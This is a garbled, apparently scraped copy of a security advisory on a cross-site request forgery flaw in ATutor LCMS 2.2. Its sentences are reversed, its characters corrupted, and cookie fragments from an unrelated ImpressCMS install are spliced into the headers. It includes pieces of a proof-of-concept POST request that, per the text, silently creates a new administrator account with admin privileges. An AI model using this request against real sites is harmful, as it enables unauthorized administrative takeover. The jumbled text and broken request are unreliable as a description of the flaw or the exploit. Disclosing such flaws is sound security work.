#ATUTOR SOFTWARE PASSWORD#
User-Agent: Mozilla/5.0 (Windows NT 6.1 WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/.111 Safari/537.36Ĭontent-Type: application/x-/impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_ordersel=ASC /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_limitsel=15 /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_filtersel=default flash=yes PHPSESSID=tg14v79ionj9d7lpelap300p33 cms-panel-collapsed-cms-menu=false cms-panel-collapsed-cms-content-tools-CMSPagesController=true cms-panel-collapsed-cms-content-tools-CMSMain=false _gat=1 _ga=GA11711.1425057132įorm_password_hidden=ef0f8b6ffb699f90933a3321b00ff6769e018b94&password_error=&login=csr &priv_admin=1&submit=Saveīy executing the following Proof-of-Concept, a new administrative user called “csrfadmin99” will be created with the password “ ”. POST /atutor-2.2/ATutor/mods/_core/users/admins/create.php HTTP/1.1Īccept: text/html,application/xhtml+xml,application/xml q=0.9,image/webp,*/* q=0.8 When an authenticated administrative user of ATutor LCMS is creating another administrator account, the following POST request is sent to the server:
Vulnerability Type: Cross-Site Request Forgery, CSRF (CWE-352)ĭescription: ATutor is an Open Source Web-based Learning Content Management System (LCMS) designed with accessibility and adaptability in mind. ATutor LCMS – CSRF Vulnerability in Version 2.2
0 kommentar(er)
